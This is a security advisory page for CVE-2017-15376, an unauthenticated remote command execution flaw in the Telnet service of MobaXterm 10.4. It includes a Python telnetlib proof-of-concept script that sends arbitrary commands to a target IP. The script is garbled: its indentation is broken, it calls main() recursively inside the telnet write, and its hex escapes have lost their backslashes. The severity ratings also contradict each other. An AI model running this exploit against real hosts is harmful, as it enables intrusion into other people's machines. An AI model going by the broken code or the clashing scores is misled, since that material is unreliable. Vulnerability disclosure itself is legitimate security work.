Lucene search

K
vulnerlabSultan Albalawi [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Sultan+AlbalawiVULNERABLE:2097
HistorySep 18, 2017 - 12:00 a.m.

MobaXtrem v10.4 - Remote Code Execution Vulnerability

2017-09-1800:00:00
Sultan Albalawi [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Sultan+Albalawi
www.vulnerability-lab.com
32

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.006 Low

EPSS

Percentile

77.9%

Document Title:
===============
MobaXtrem v10.4 - Remote Code Execution Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2097

Video: https://www.youtube.com/watch?v=FtBGmwFtRrE

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15376

CVE-ID:
=======
CVE-2017-15376


Release Date:
=============
2017-09-18


Vulnerability Laboratory ID (VL-ID):
====================================
2097


Common Vulnerability Scoring System:
====================================
6.5


Vulnerability Class:
====================
Code Execution


Current Estimated Price:
========================
3.000€ - 4.000€


Product & Service Introduction:
===============================
We have been creating system and network software since 2008 for worldwide users. Mobatek develops high value products in 
order to provide efficient and cost effective solutions for your IT, development and DBA teams. Our products are designed 
to ensure high security, efficiency and focused on user experience. No headache for deployment: our products do not require 
any dependency, Internet connection or third-party software to run.

(Copy of the Homepage: http://www.mobatek.net/ )
(Source: http://download.mobatek.net/10420170816103227/MobaXterm_Portable_v10.4.zip )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote code execution vulnerability in the official MobaXtrem v10.4 software.


Vulnerability Disclosure Timeline:
==================================
2017-09-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Mobatek
Product: MobaXtrem - Software 10.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A remote code execution vulnerability has been discovered in the official MobaXtrem v10.4 software.
The vulnerability allows remote attackers to unauthorized execute malicious codes to compromise the targeted computer system.

Telnet service doesn't authenticate for a remote conncection which allows attacker to pass malicious commands over 
victims computer system through the basic protocol.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local and remote attackers without user interaction or privileged user accounts.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

import telnetlib,sys

print """
Exploit => MobaXtrem 10.4 Remote Code Execution
Discoverer => Sultan Albalawi
"""
def get_set(HOST,cmd):
		try :
			tn = telnetlib.Telnet(HOST)
			bg="x63x79x67x73x74x61x72x74"
			tn.write(bg+" ./"+cmd+"n")
			tn.write(main())
			tn.read_all()
		except KeyboardInterrupt:
			print "[-] Execution stopped ... keyboard interrupt raised"
		except Exception as e:
			pass 		
	def main():
		if len(sys.argv)==2:
			HOST = sys.argv[1]
			cmd = str(raw_input("cmd> "))
			if "exit" in cmd :
				sys.exit("exiting...")
			else:
				print"Executing => %s"%cmd
				get_set(HOST,cmd)
		else:
			print "Usage: ./"+sys.argv[0]+" <target_ip>"		
	if __name__ == '__main__':
			main()	


Security Risk:
==============
The security risk of the remote code execution vulnerability in the software is estimated as high (CVSS).


Credits & Authors:
==================
Sultan Albalawi [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Sultan+Albalawi


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™



10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.006 Low

EPSS

Percentile

77.9%

Related for VULNERABLE:2097